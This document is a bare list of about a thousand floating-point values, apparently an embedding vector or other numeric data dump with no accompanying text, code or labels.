0.0021686654072254896, 0.0179409459233284, 0.016284404322504997, 0.011935980059206486, -0.015737153589725494, 0.005997571162879467, -0.004060008097440004, -0.029107816517353058, -0.032746296375989914, 0.015071578323841095, 0.018281130120158195, -0.007868576794862747, -0.03280545771121979, -0.013607312925159931, -0.022540809586644173, 0.028087269514799118, -0.018813589587807655, 0.042005185037851334, -0.002246315823867917, 0.02026306465268135, 0.034757811576128006, -0.01269029825925827, 0.01933125965297222, -0.0035922566894441843, 0.011906398460268974, 0.0051692998968064785, 0.0014818289782851934, -0.006729703862220049, 0.04126565530896187, -0.019434792920947075, 0.004322540480643511, -0.007432255428284407, 0.030646035447716713, 0.03836670517921448, -0.016846444457769394, 0.00248296489007771, -0.00224261824041605, 0.0111298942938447, -0.02822038345038891, -0.01364428922533989, 0.009088797494769096, -0.046915650367736816, -0.01547092292457819, 0.020647618919610977, -0.013592522591352463, 0.02012994885444641, -0.010804502293467522, 0.016402728855609894, -0.007162327412515879, -0.01802968978881836, -0.017704296857118607, 0.03576356917619705, -0.011203847825527191, 0.01842903532087803, 0.0024885113816708326, -0.003301992081105709, 0.014198935590684414, 0.010545667260885239, -0.0564703494310379, -0.03531984984874725, 0.0071438392624258995, 0.0111298942938447, 0.0024478372652083635, -0.007069886662065983, 0.006178755313158035, -0.005808991380035877, 0.022644342854619026, -0.0083048976957798, -0.005990175995975733, -0.01055306289345026, -0.01740848645567894, -0.0017203267198055983, 0.0004506497934926301, 0.003721673972904682, 0.026519469916820526, -0.00005500238694366999, 0.023664891719818115, 0.012949133291840553, 0.0014596431283280253, 0.006396916229277849, -0.03103058971464634, -0.029862135648727417, 0.01300089992582798, -0.0013145108241587877, -0.009562095627188683, 0.0181628055870533, 0.011566216126084328, -0.0037198252975940704, -0.021579423919320107, -0.007661508861929178, 0.008142202161252499, -0.03972743824124336, 0.001449474599212408, 0.023073269054293633, -0.022851411253213882, 0.03316042944788933, -0.011492263525724411, -0.023709263652563095, 0.013792195357382298, -0.025617245584726334, 0.01933125965297222, 0.045791566371917725, 0.03206592798233032, -0.008482384495437145, -0.009066611528396606, 0.014738790690898895, -0.041295237839221954, 0.011344357393682003, -0.0026253240648657084, 0.029226141050457954, 0.011862027458846569, 0.015293436124920845, 0.003205853281542659, 0.016402728855609894, 0.007528393995016813, -0.0066298674792051315, 0.01865089312195778, 0.02212667465209961, -0.009340236894786358, 0.006241615395992994, -0.025720778852701187, 0.004647932946681976, -0.0367693267762661, -0.023472614586353302, 0.018443824723362923, -0.023679682984948158, -0.009695210494101048, 0.0017415881156921387, 0.008593314327299595, -0.0000499759080412332, -0.033278755843639374, -0.008541546761989594, -0.02595742791891098, 0.007258465979248285, 0.01366647519171238, 0.0031836675480008125, 0.004322540480643511, 0.020691990852355957, -0.03103058971464634, 0.01763034425675869, 0.01603296399116516, -0.003830754430964589, -0.02243727631866932, 0.0067629823461174965, 0.02208230271935463, 0.016979560256004333, -0.010353390127420425, -0.007203001528978348, 0.005812689196318388, -0.03280545771121979, -0.013207968324422836, -0.010678783059120178, 0.002638265723362565, 0.021091334521770477, 0.006803656462579966, 0.0021945489570498466, 0.014797952957451344, 0.00513232359662652, 0.046767741441726685, -0.0005486372392624617, 0.030291061848402023, -0.04324759170413017, -0.018014898523688316, -0.00436321459710598, 0.016136499121785164, 0.015323017723858356, 0.024877717718482018, -0.033633727580308914, -0.02609054371714592, 0.006755587179213762, -0.002057736273854971, -0.0044852364808321, 0.018103642389178276, 0.023886751383543015, -0.004744071513414383, -0.02083989605307579, 0.005590830929577351, -0.0056721786968410015, 0.0013071155408397317, 0.021623795852065086, -0.011092917993664742, 0.002381279831752181, 0.023428242653608322, 0.011285195127129555, -0.040230315178632736, -0.02582431398332119, -0.0518261156976223, 0.03597063571214676, -0.025173529982566833, 0.009229307994246483, -0.026149705052375793, 0.028738053515553474, 0.02817601151764393, -0.009088797494769096, 0.005195183213800192, -0.006230522412806749, 0.05129365250468254, -0.02310285158455372, 0.042300995439291, 0.006748192012310028, 0.006223127245903015, -0.02533622458577156, 0.06324442476034164, -0.033278755843639374, 0.026341982185840607, -0.01922772452235222, -0.04709313437342644, -0.012675507925450802, 0.028930330649018288, 0.01516032125800848, -0.016683749854564667, -0.018458615988492966, -0.03286461904644966, 0.0004668269830290228, -0.015544876456260681, 0.001298795803450048, -0.02296973578631878, 0.009066611528396606, -0.017275370657444, -0.0016121708322316408, -0.004374307580292225, -0.0035349433310329914, 0.029329676181077957, 0.007029212545603514, -0.0017480590613558888, 0.013518569990992546, 0.019390420988202095, 0.061647042632102966, -0.03866251930594444, 0.02653426118195057, 0.039431627839803696, -0.0005495616351254284, 0.012261372059583664, -0.02626802958548069, 0.02684486284852028, 0.010708363726735115, 0.021120917052030563, 0.03197718411684036, 0.011418310925364494, -0.016284404322504997, 0.011226032860577106, -0.019449584186077118, 0.020410969853401184, -0.008844753727316856, 0.01928688772022724, -0.01931646838784218, -0.029714230448007584, 0.03827796131372452, -0.031237658113241196, -0.02715546451508999, -0.019109399989247322, -0.02092863991856575, -0.007617137394845486, -0.005546458996832371, 0.03295336291193962, -0.0004148289153818041, 0.024108609184622765, 0.013097038492560387, 0.033101268112659454, -0.019878508523106575, 0.002656753873452544, 0.059280555695295334, 0.011699330992996693, -0.023206384852528572, -0.0020521897822618484, 0.014398607425391674, 0.004784745164215565, 0.014716604724526405, 0.0314447246491909, 0.022910574451088905, 0.0031282028649002314, -0.014672232791781425, 0.006452380679547787, -0.013614708557724953, -0.006012361496686935, 0.005091649480164051, 0.004318842664361, -0.03472822904586792, -0.01811843365430832, 0.006337753962725401, 0.041561465710401535, 0.0019874812569469213, 0.006267498712986708, 0.0058570606634020805, -0.032391320914030075, 0.03298294171690941, 0.004063705913722515, -0.014465165324509144, -0.0010732398368418217, 0.01061962079256773, -0.026992768049240112, -0.0012248430866748095, 0.04857219010591507, -0.015796314924955368, -0.0002345690008951351, -0.028841586783528328, -0.041827697306871414, 0.027303369715809822, 0.024833345785737038, 0.009177541360259056, -0.024330466985702515, -0.01758597232401371, -0.010804502293467522, 0.008186574093997478, 0.01842903532087803, 0.024596696719527245, -0.037686340510845184, -0.011862027458846569, -0.0051064398139715195, 0.012512811459600925, -0.009754372760653496, 0.009051821194589138, 0.004060008097440004, 0.013341083191335201, 0.05744652450084686, 0.0012183721410110593, 0.025262271985411644, -0.014760976657271385, 0.019789766520261765, 0.01335587352514267, 0.010693573392927647, -0.023487405851483345, 0.018813589587807655, -0.007469231728464365, 0.017512019723653793, -0.021756909787654877, 0.017290161922574043, 0.012623741291463375, -0.005842270329594612, 0.024951670318841934, -0.00021492528321687132, -0.004991813097149134, 0.016935188323259354, 0.007824204862117767, -0.009451166726648808, -0.00048531516222283244, 0.026327192783355713, 0.013141410425305367, -0.015108554624021053, -0.002638265723362565, 0.026031380519270897, -0.0011998839909210801, -0.016106916591525078, -0.041295237839221954, 0.01061962079256773, 0.009428980760276318, -0.02737732231616974, 0.010479110293090343, -0.021002592518925667, 0.017556391656398773, 0.017837412655353546, -0.006559612229466438, 0.01088585052639246, -0.005953199230134487, -0.024729812517762184, 0.005842270329594612, 0.027170253917574883, -0.0274660661816597, -0.011669750325381756, -0.030157946050167084, -0.047448109835386276, -0.03076435998082161, 0.005409646313637495, 0.012801227159798145, -0.021712537854909897, 0.010582643561065197, 0.006541124079376459, 0.04425334930419922, 0.009140565060079098, -0.0015594793949276209, 0.010331204161047935, -0.008637685328722, -0.02498125098645687, 0.03342666104435921, 0.003004332073032856, 0.04664941877126694, -0.03851461037993431, -0.01674291118979454, -0.004762559663504362, -0.006766680162400007, -0.0034110723063349724, 0.01547092292457819, 0.01834029145538807, 0.009406794793903828, 0.0011823201784864068, -0.007935133762657642, 0.0029692044481635094, 0.008253131061792374, 0.04688606783747673, -0.020189112052321434, -0.0032835036981850863, 0.031001009047031403, 0.00041644665179774165, -0.030616454780101776, -0.014576094225049019, -0.011536634527146816, 0.008807777427136898, 0.0010242460994049907, -0.008563732728362083, -0.01931646838784218, 0.020366597920656204, -0.04457874223589897, 0.024064237251877785, 0.01999683305621147, -0.022762667387723923, -0.01215783879160881, -0.023221176117658615, -0.012298348359763622, -0.00861549936234951, 0.012549787759780884, 0.04176853597164154, -0.004951138980686665, 0.01665416732430458, 0.042892616242170334, 0.017970526590943336, 0.016447100788354874, -0.03236173838376999, 0.013947496190667152, 0.001970841782167554, -0.004426074214279652, 0.022141464054584503, 0.0003193836018908769, -0.017083093523979187, -0.004573979880660772, 0.009110983461141586, -0.013629498891532421, -0.009983626194298267, 0.004389097914099693, 0.017556391656398773, 0.017689507454633713, 0.017837412655353546, -0.01273467019200325, 0.00590143259614706, -0.0033112361561506987, -0.008940892294049263, -0.004130263347178698, 0.0024330466985702515, 0.012823413126170635, -0.0035719196312129498, 0.003091226564720273, 0.01555966679006815, -0.002087317407131195, -0.005838572513312101, -0.03316042944788933, -0.029595905914902687, -0.056174539029598236, -0.010183298960328102, 0.01638793759047985, 0.03647351637482643, 0.011928584426641464, 0.006910888012498617, 0.037863828241825104, -0.0034480488393455744, -0.00939200446009636, -0.026164496317505836, 0.007151234429329634, -0.023620519787073135, -0.02938883751630783, 0.007066188845783472, -0.006230522412806749, 0.04099942743778229, -0.021712537854909897, -0.0033944330643862486, -0.016047755256295204, 0.006873911712318659, -0.00293777440674603, -0.031592629849910736, 0.0248037651181221, 0.002124293940141797, -0.024241723120212555, 0.029137399047613144, 0.012342720292508602, -0.03001004084944725, 0.02239290438592434, -0.0006221278454177082, 0.016994351521134377, -0.010057578794658184, 0.04644235223531723, 0.0047884429804980755, -0.012106071226298809, 0.007395278662443161, 0.007325023878365755, 0.0023720357567071915, 0.0007691089995205402, 0.024434000253677368, 0.007809414528310299, 0.007395278662443161, -0.00993185956031084, 0.03215467184782028, -0.007705880329012871, -0.001087105949409306, 0.04224183410406113, -0.008179178461432457, -0.02092863991856575, 0.006829539779573679, -0.002706672064960003, -0.010301623493432999, -0.009406794793903828, -0.025439759716391563, -0.03067561611533165, -0.003978659864515066, -0.017512019723653793, -0.01656542532145977, -0.004551793914288282, 0.026963187381625175, 0.06419102102518082, 0.013851357623934746, -0.026075752452015877, 0.010294227860867977, -0.0096360482275486, 0.018665684387087822, 0.021668167784810066, -0.0006803656578995287, 0.021756909787654877, -0.019612278789281845, 0.004311447497457266, -0.008571128360927105, -0.00019897922175005078, -0.006859120912849903, -0.01607733592391014, -0.023620519787073135, 0.02493688091635704, 0.004810628946870565, 0.00372906937263906, -0.01235751062631607, -0.03611854091286659, 0.03463948518037796, 0.014613070525228977, 0.013821776024997234, -0.007406371645629406, 0.013851357623934746, -0.026238448917865753, -0.014997625723481178, 0.021254030987620354, -0.011433101259171963, -0.0222597885876894, 0.006892399862408638, -0.023679682984948158, -0.005916222929954529, -0.01456130389124155, -0.0067740753293037415, 0.024241723120212555, -0.023724054917693138, -0.015574457123875618, -0.013037876226007938, -0.021180078387260437, 0.010227670893073082, -0.012261372059583664, 0.012187419459223747, -0.022185835987329483, -0.00048254194553010166, 0.02066240832209587, 0.03552692010998726, 0.0026401146315038204, 0.003122656373307109, 0.009702606126666069, -0.009673024527728558, 0.034254930913448334, 0.02252601832151413, -0.025010833516716957, -0.011336962692439556, 0.03250964730978012, 0.0389879085123539, -0.011115103960037231, 0.004562886897474527, -0.0033130848314613104, -0.016358356922864914, 0.013452012091875076, -0.017467647790908813, 0.008763405494391918, 0.031770117580890656, -0.008134806528687477, 0.0005038033705204725, 0.03348582237958908, 0.040940262377262115, -0.006537426263093948, 0.015308227390050888, -0.016757702454924583, 0.010967198759317398, 0.022629553452134132, -0.009939254261553288, 0.007199303712695837, 0.02498125098645687, 0.005017696879804134, -0.012697693891823292, -0.012889971025288105, -0.00832708366215229, -0.011662354692816734, -0.001695367624051869, -0.014783162623643875, -0.0012553485576063395, 0.008889124728739262, 0.022984527051448822, 0.010116741061210632, -0.005472506396472454, 0.03848503157496452, -0.031770117580890656, 0.01124082412570715, -0.042005185037851334, -0.00025005286443047225, 0.0060752215795218945, 0.013097038492560387, 0.011654959060251713, -0.008926101960241795, 0.016151288524270058, -0.001808145665563643, 0.017482439056038857, 0.028604937717318535, -0.018414244055747986, -0.005579737946391106, 0.008460198529064655, -0.005136020947247744, 0.01555966679006815, 0.006056733429431915, 0.01342243142426014, -0.006119593046605587, -0.035379014909267426, 0.028368288651108742, 0.004588770680129528, -0.011433101259171963, 0.01424330659210682, 0.008800381794571877, 0.04312926530838013, 0.028516195714473724, -0.00964344386011362, -0.026593422517180443, -0.0024182561319321394, -0.011972956359386444, -0.04188685864210129, 0.02427130565047264, 0.0061158956959843636, -0.007491417229175568, 0.012934342958033085, 0.007325023878365755, 0.041650209575891495, -0.0030579478479921818, -0.014073215425014496, 0.007299140095710754, 0.016506262123584747, 0.017245789989829063, -0.009029635228216648, 0.006359939929097891, 0.01953832618892193, -0.00832708366215229, 0.030039623379707336, -0.011181661859154701, 0.03027627058327198, -0.01119645219296217, -0.0022740482818335295, 0.00990227796137333, 0.021875234320759773, -0.008667266927659512, 0.009850511327385902, 0.01110770832747221, 0.01022027526050806, -0.03827796131372452, -0.017778249457478523, 0.009436375461518764, 0.00438540056347847, 0.031060170382261276, -0.02462627924978733, 0.008844753727316856, -0.04321800917387009, 0.030734779313206673, 0.02943320944905281, 0.020987801253795624, 0.007979505695402622, 0.009843115694820881, -0.013947496190667152, -0.00699963141232729, 0.00990227796137333, 0.005172997713088989, -0.033012524247169495, -0.009584281593561172, 0.025143947452306747, 0.007750252261757851, 0.024212142452597618, 0.0037845338229089975, 0.015485714189708233, 0.005916222929954529, 0.0096360482275486, 0.005391158163547516, 0.011085523292422295, -0.02257039025425911, -0.009177541360259056, -0.015411760658025742, -0.000580991618335247, 0.00832708366215229, 0.023132432252168655, 0.012165233492851257, 0.009192331694066525, -0.007376790512353182, -0.010774921625852585, -0.012453649193048477, 0.01718662865459919, 0.013629498891532421, -0.010723154060542583, 0.017659924924373627, -0.013141410425305367, -0.03171095624566078, -0.004525910597294569, 0.018976286053657532, -0.0363256111741066, 0.030823521316051483, 0.016949979588389397, -0.023265548050403595, 0.025454549118876457, 0.01946437358856201, 0.006984840612858534, -0.018502987921237946, -0.024522744119167328, -0.02039617858827114, 0.031503885984420776, 0.0032964455895125866, -0.009096193127334118, 0.002294385340064764, 0.003801173297688365, -0.014028843492269516, -0.0010824839118868113, 0.014820138923823833, -0.010442133992910385, -0.015663200989365578, -0.022363323718309402, -0.01723099872469902, 0.011943375691771507, -0.017171837389469147, 0.009436375461518764, -0.006700122728943825, 0.011640168726444244, 0.007073584012687206, 0.00837145559489727, 0.00623422022908926, -0.018710054457187653, 0.0006780546391382813, 0.01300089992582798, -0.013562940992414951, -0.0077428570948541164, 0.021668167784810066, 0.001411573844961822, -0.008896520361304283, -0.009362422861158848, -0.014376422390341759, -0.0241381898522377, 0.018710054457187653, 0.0041524488478899, -0.012394486926496029, 0.011078127659857273, -0.015382179990410805, -0.005527970846742392, -0.02385716885328293, -0.0002609146758913994, -0.025143947452306747, 0.016624586656689644, -0.0033870376646518707, -0.009576885960996151, 0.006851725745946169, 0.011263009160757065, 0.01825154758989811, -0.030823521316051483, -0.019582698121666908, -0.009525119327008724, -0.002863821806386113, -0.0011453437618911266, -0.005535366013646126, -0.020721571519970894, 0.004958534613251686, -0.0186065211892128, -0.0020244575571268797, -0.023975493386387825, -0.007912948727607727, 0.02323596552014351, -0.009236703626811504, 0.005668481346219778, -0.0070920721627771854, 0.031237658113241196, -0.00810522586107254, 0.0008818869828246534, -0.008319688960909843, -0.01776346005499363, -0.004355819430202246, -0.006866516545414925, 0.004607258830219507, 0.010419948026537895, -0.028249964118003845, 0.028072478249669075, 0.0017147802282124758, 0.021963978186249733, -0.00529871741309762, -0.013244944624602795, 0.04247848317027092, 0.0016851992113515735, -0.021165287122130394, -0.01520469319075346, 0.007631927728652954, 0.0009826476452872157, -0.01692039705812931, -0.010235065594315529, -0.003403677139431238, 0.009850511327385902, 0.012261372059583664, 0.011070732027292252, 0.023265548050403595, 0.012971319258213043, 0.036266446113586426, -0.04061486944556236, -0.01802968978881836, 0.0009669326827861369, 0.026652585715055466, 0.023206384852528572, -0.020987801253795624, -0.0047773499973118305, 0.0016972165321931243, -0.01990809105336666, -0.018532568588852882, -0.0014966195449233055, 0.01022027526050806, -0.0034480488393455744, 0.0029396233148872852, -0.015796314924955368, -0.011706726625561714, -0.009769163094460964, -0.02217104658484459, 0.010035393759608269, -0.0068369354121387005, -0.0011166870826855302, 0.024079028517007828, 0.007254768628627062, -0.002948867389932275, 0.015396970324218273, -0.03165179491043091, -0.004977022763341665, 0.0037789875641465187, -0.019420001655817032, -0.0016981408698484302, 0.0006309097516350448, -0.019198143854737282, 0.015101158991456032, -0.0008365908870473504, -0.010693573392927647, 0.002250013640150428, 0.00843801349401474, -0.005309810396283865, 0.004866093397140503, -0.032302577048540115, -0.019656650722026825, -0.029551533982157707, 0.022363323718309402, 0.0011601343285292387, 0.019153771921992302, 0.011980351991951466, -0.0022352230735123158, 0.004721885547041893, -0.018310710787773132, -0.00868205726146698, -0.028131641447544098, 0.005335693713277578, 0.0018811740446835756, -0.0056721786968410015, 0.009791349060833454, 0.014036239124834538, 0.016994351521134377, 0.010353390127420425, -0.006219429429620504, 0.008940892294049263, -0.029802974313497543, 0.015278645791113377, 0.005413344129920006, -0.009517723694443703, -0.029492372646927834, -0.008622894994914532, 0.002630870323628187, -0.01621045172214508, 0.037686340510845184, 0.0015567061491310596, -0.0034961181227117777, -0.013614708557724953, -0.010235065594315529, 0.012128257192671299, -0.0011166870826855302, 0.0089704729616642, -0.007158630061894655, 0.0026364168152213097, -0.002800961956381798, 0.004322540480643511, 0.021120917052030563, -0.0037771386560052633, -0.01973060332238674, 0.0005939333350397646, 0.008571128360927105, 0.013074852526187897, 0.01121863815933466, 0.007044002879410982, -0.01144049596041441, -0.01516032125800848, -0.02983255498111248, -0.0017064606072381139, 0.017275370657444, 0.02083989605307579, -0.00810522586107254, -0.007949925027787685, -0.01371084712445736, 0.014923672191798687, -0.013207968324422836, -0.02542496845126152, 0.004544398747384548, 0.018636101856827736, 0.001793355098925531, -0.0011961862910538912, 0.013126620091497898, 0.04194601997733116, -0.0035811637062579393, 0.019449584186077118, -0.042863037437200546, -0.018591731786727905, -0.02822038345038891, 0.026386354118585587, -0.012993505224585533, 0.021978769451379776, -0.002438593190163374, -0.008785591460764408, -0.018458615988492966, 0.00925888866186142, 0.024167770519852638, -0.016683749854564667, 0.03682848811149597, -0.023117640987038612, 0.02916697971522808, -0.021845653653144836, 0.005979083012789488, 0.004182029981166124, 0.006592891179025173, 0.014857115224003792, -0.0002205873024649918, -0.012520207092165947, -0.013718241825699806, 0.0010168508160859346, 0.021224450320005417, -0.019834138453006744, 0.010663991793990135, -0.02555808424949646, -0.020425759255886078, -0.01331150159239769, 0.009155355393886566, 0.0018737787613645196, -0.005032487213611603, -0.008201364427804947, -0.011248218826949596, -0.016047755256295204, -0.006016059312969446, -0.030646035447716713, 0.0036255354061722755, -0.009946649894118309, 0.00560931907966733, 0.022851411253213882, 0.005209974013268948, 0.02520311065018177, 0.024286095052957535, -0.021697748452425003, 0.0077206711284816265, -0.028294336050748825, -0.017512019723653793, 0.011492263525724411, -0.0033149337396025658, -0.00872642919421196, 0.023117640987038612, 0.01665416732430458, -0.010057578794658184, -0.022777458652853966, 0.006574403028935194, 0.029492372646927834, -0.0009142413618974388, 0.0024016168899834156, 0.0020059694070369005, 0.026918815448880196, -0.010538272559642792, -0.011359148658812046, 0.031178494915366173, -0.02243727631866932, -0.02150547131896019, 0.0018062968738377094, -0.01551529485732317, -0.008696847595274448, -0.003949078731238842, 0.012823413126170635, -0.009377213194966316, 0.007029212545603514, 0.011972956359386444, -0.013814380392432213, -0.004718187730759382, 0.015396970324218273, 0.02622365951538086, -0.004455655347555876, -0.0037512551061809063, 0.0021594213321805, 0.0136221032589674, -0.02890074998140335, 0.0013052667491137981, -0.015175112523138523, 0.009539909660816193, 0.005139718763530254, -0.0006466247141361237, -0.008120016194880009, 0.012889971025288105, -0.008356665261089802, 0.01177328359335661, -0.003926893230527639, 0.008356665261089802, 0.019834138453006744, -0.012224395759403706, -0.001721251173876226, -0.024345258250832558, 0.0021908513735979795, 0.007520998362451792, -0.002684486098587513, -0.014354236423969269, -0.016491470858454704, 0.002747346181422472, -0.006208336446434259, 0.019405212253332138, 0.0004686758038587868, 0.03049813024699688, -0.0002327201800653711, -0.009436375461518764, -0.008046063594520092, -0.015441342256963253, 0.01847340725362301, 0.0019726906903088093, 0.015530085191130638, -0.010686177760362625, -0.003656965447589755, 0.015308227390050888, -0.007609741762280464, -0.006119593046605587, -0.017068304121494293, -0.011876817792654037, 0.011033755727112293, 0.00934763252735138, -0.0035497338976711035, -0.010227670893073082, 0.008001691661775112, -0.016757702454924583, -0.005021394230425358, -0.006951562128961086, -0.0007187286391854286, 0.012128257192671299, -0.018044481053948402, -0.0132893156260252, -0.0019079819321632385, -0.0010353390825912356, 0.0062379175797104836, 0.0027861713897436857, 0.004304052330553532, 0.015485714189708233, -0.00043308601016178727, 0.0033426659647375345, -0.0009184011723846197, -0.00271036964841187, -0.035645242780447006, -0.009983626194298267, 0.0072177923284471035, 0.003747557522729039, 0.04221225157380104, 0.016935188323259354, -0.004622049164026976, 0.024389630183577538, -0.00342771178111434, 0.007705880329012871, 0.0074026742950081825, 0.00011503125278977677, -0.002196397865191102, 0.008171782828867435, -0.01555966679006815, -0.013296711258590221, 0.023428242653608322, -0.00832708366215229, 0.005927315913140774, -0.016240032389760017, 0.003120807697996497, -0.017467647790908813, 0.012594159692525864, 0.002000422915443778, 0.008918706327676773, 0.0012655170867219567, 0.002630870323628187, -0.0019338653655722737, 0.006359939929097891, -0.0012867784826084971, -0.01520469319075346, 0.0024866624735295773, -0.007498812861740589, 0.015485714189708233, 0.0038714285474270582, 0.005664783529937267, -0.007273256778717041, -0.010745340026915073, 0.018591731786727905, 0.01022027526050806, -0.009695210494101048, -0.0132893156260252, 0.013880938291549683, 0.0033574565313756466, 0.035911474376916885, -0.0052913217805325985, 0.011884213425219059, 0.002030004048720002, 0.001373673090711236, 0.006744494196027517, -0.011632774025201797, 0.024862926453351974, -0.015530085191130638, 0.007410069461911917, 0.0029544138815253973, -0.0035534314811229706, -0.01647668145596981, -0.01484971959143877, -0.010079764761030674, 0.004455655347555876, 0.0012017327826470137, -0.011159475892782211, 0.0006762057892046869, -0.014043634757399559, 0.02230416052043438, 0.008593314327299595, 0.0019782371819019318, -0.006359939929097891, -0.008741219528019428, 0.006130686029791832, -0.017201418057084084, 0.008497175760567188, -0.02021869271993637, 0.006781470496207476, 0.035911474376916885, -0.01576673425734043, -0.019346049055457115, 0.015189902856945992, -0.01576673425734043, -0.030217109248042107, -0.011765888892114162, 0.0009844964370131493, 0.01117426622658968, 0.027185045182704926, -0.0060752215795218945, 0.006019757129251957, -0.01995246298611164, 0.01547092292457819, 0.004633142147213221, 0.01625482365489006, 0.011366543360054493, 0.01269029825925827, 0.006330358795821667, -0.0041006822139024734, -0.004917860496789217, 0.0075136031955480576, -0.0024922089651226997, 0.017334533855319023, -0.010345995426177979, 0.005764619912952185, 0.026415936648845673, 0.011980351991951466, 0.010309018194675446, -0.0022185835987329483, -0.01246844045817852, -0.005860758479684591, -0.01516032125800848, 0.016890816390514374, -0.01838466338813305, 0.020514503121376038, 0.008940892294049263, 0.001355184824205935, -0.0011749248951673508, -0.01560403872281313, -0.01555966679006815, 0.00908140279352665, -0.014280283823609352, -0.004474143497645855, -0.004551793914288282, 0.02057366631925106, 0.004755164496600628, 0.0016362054739147425, -0.038307543843984604, -0.02221541665494442, -0.0051582069136202335, 0.025572873651981354, -0.01429507415741682, -0.006921980995684862, 0.0006789790350012481, 0.011322171427309513, 0.019745394587516785, -0.004522212781012058, 0.009510328993201256, -0.007195606362074614, -0.013947496190667152, 0.024152981117367744, 0.009221912361681461, -0.01585547812283039, -0.005738736130297184, 0.007214094512164593, 0.008245735429227352, 0.004806931130588055, 0.0020244575571268797, -0.07046221941709518, -0.009177541360259056, -0.0015215786406770349, 0.022688714787364006, 0.004880884196609259, 0.006001268979161978, -0.013747823424637318, -0.004618351813405752, 0.004769954830408096, -0.013230153359472752, -0.011092917993664742, 0.028959911316633224, -0.0019190747989341617, -0.007609741762280464, -0.018088851124048233, -0.006204639095813036, -0.002804659539833665, -0.010627015493810177, -0.014080611057579517, -0.007631927728652954, 0.009776558727025986, 0.014287678524851799, 0.005845967680215836, 0.006119593046605587, 0.01922772452235222, 0.0012331627076491714, 0.022895783185958862, -0.02310285158455372, 0.012461044825613499, -0.03313085064291954, -0.004093287046998739, 0.009680420160293579, 0.0009530665702186525, -0.005816387012600899, -0.008844753727316856, -0.0046516302973032, 0.002551371231675148, 0.030793940648436546, 0.014842324890196323, -0.000024280201614601538, 0.005383762996643782, -0.00482172193005681, -0.015019811689853668, 0.004011938814073801, 0.006319265812635422, 0.005195183213800192, 0.00743595277890563, -0.00743595277890563, -0.0013607313157990575, 0.0013958588242530823, 0.0022074906155467033, -0.01621045172214508, 0.011588402092456818, 0.008319688960909843, 0.01763034425675869, 0.01053087692707777, -0.009110983461141586, 0.02751043625175953, 0.02644551731646061, 0.02671174705028534, 0.0002210495003964752, 0.0026160799898207188, -0.006348846945911646, -0.0033999793231487274, 0.019375629723072052, 0.004281866364181042, 0.023768426850438118, -0.01516032125800848, -0.013829171657562256, 0.012505416758358479, 0.006862818729132414, 0.007476626895368099, -0.026253240182995796, -0.018547359853982925, 0.0024311980232596397, -0.011470077559351921, 0.020869476720690727, 0.014213725924491882, -0.00525434548035264, 0.0016325077740475535, -0.02141672745347023, 0.010959803126752377, -0.014043634757399559, -0.020588455721735954, 0.012076490558683872, 0.003189214039593935, -0.01121863815933466, -0.003087528981268406, -0.001785035477951169, 0.01465004775673151, 0.017512019723653793, 0.0023202686570584774, 0.014812743291258812, 0.02947758138179779, -0.015914639458060265, -0.014124982059001923, -0.002189002465456724, 0.0001479055790696293, 0.004932650830596685, -0.007014421746134758, 0.023945912718772888, 0.004710792563855648, 0.006818447262048721, 0.011011569760739803, 0.0017526810988783836, -0.0037697432562708855, -0.016373148187994957, -0.0017563786823302507, 0.0007991523016244173, -0.01124082412570715, 0.0004409434914123267, -0.005391158163547516, 0.00577571289613843, 0.003359305439516902, 0.018325500190258026, 0.00993185956031084, 0.012342720292508602, -0.005013999063521624, -0.020026415586471558, -0.024596696719527245, 0.014124982059001923, 0.005269136279821396, -0.0067518893629312515, 0.03780466690659523, -0.004326238296926022, 0.014724000357091427, -0.008874334394931793, 0.0002997398842126131, -0.0005893112975172698, -0.009318050928413868, -0.0006923829787410796, 0.020987801253795624, -0.0016352810198441148, -0.006359939929097891, 0.0019301677821204066, -0.030157946050167084, 0.0004333171236794442, -0.00932544656097889, -0.023945912718772888, -0.0012673658784478903, -0.027081511914730072, -0.011617982760071754, 0.003915800247341394, -0.0032409809064120054, 0.003631081897765398, -0.0019338653655722737, -0.013784799724817276, -0.022954944521188736, 0.006581798195838928, -0.00028217610088177025, -0.0036033496726304293, -0.00033740958315320313, 0.015840686857700348, -0.017881784588098526, -0.001634356565773487, -0.0015973802655935287, -0.012527602724730968, -0.016802072525024414, -0.011558820493519306, -0.0009442846640013158, -0.013799590058624744, -0.007639322895556688, -0.0034591415897011757, -0.008940892294049263, 0.0031355982646346092, 0.015123344957828522, -0.006078919395804405, -0.017378905788064003, -0.006607681512832642, -0.007698485162109137, -0.013548150658607483, -0.015973802655935287, 0.003934288397431374, -0.02400507591664791, -0.008874334394931793, -0.00001053682808560552, 0.00959167629480362, 0.019686231389641762, 0.02458190731704235, -0.020292645320296288, -0.008112620562314987, -0.016949979588389397, -0.012128257192671299, -0.0009207121911458671, 0.0032391322311013937, 0.005576040130108595, -0.0037697432562708855, -0.00012548863014671952, -0.010693573392927647, -0.016639377921819687, -0.008149596862494946, -0.0036329308059066534, -0.013917914591729641, 0.013673870824277401, -0.014420793391764164, -0.033544983714818954, -0.0046664210967719555, 0.003819661447778344, 0.0068258424289524555, -0.012586764991283417, 0.0036976393312215805, -0.0046664210967719555, 0.012416672892868519, -0.015175112523138523, 0.029270512983202934, -0.01202472299337387, 0.01342243142426014, 0.03360414505004883, 0.00801648199558258, 0.005890339612960815, -0.011381333693861961, 0.0039564743638038635, -0.0038381495978683233, -0.014982834458351135, 0.0005759073537774384, -0.008275317028164864, -0.011995142325758934, 0.01422851625829935, -0.014221121557056904, 0.02052929438650608, 0.005845967680215836, -0.010893245227634907, 0.017911365255713463, -0.011544030159711838, 0.007912948727607727, -0.0011018965160474181, -0.0019412606488913298, 0.020544083788990974, 0.0445195771753788, -0.012032118625938892, -0.010900640860199928, 0.0055390638299286366, -0.001027019345201552, -0.013592522591352463, -0.015175112523138523, -0.018946703523397446, -0.002094712806865573, -0.008534152060747147, 0.0037013371475040913, -0.025055205449461937, 0.024064237251877785, 0.025439759716391563, -0.0025273365899920464, -0.02591305784881115, 0.018902333453297615, -0.006951562128961086, -0.020366597920656204, 0.007443347945809364, -0.001928318990394473, -0.009991021826863289, -0.004178332630544901, -0.0025125460233539343, 0.013474198058247566, 0.00171385589055717, 0.006160267163068056, -0.010560458526015282, -0.017023932188749313, -0.001407876145094633, 0.0018127677030861378, 0.0017230999656021595, 0.006966352462768555, -0.016757702454924583, -0.0048623960465192795, 0.008896520361304283, -0.01999683305621147, 0.025705989450216293, -0.009917069226503372, 0.000358671008143574, 0.003952776547521353, 0.025010833516716957, 0.011677145026624203, -0.03360414505004883, 0.0013126620324328542, 0.0032483763061463833, -0.011544030159711838, 0.03419576957821846, 0.027214625850319862, -0.008290107361972332, 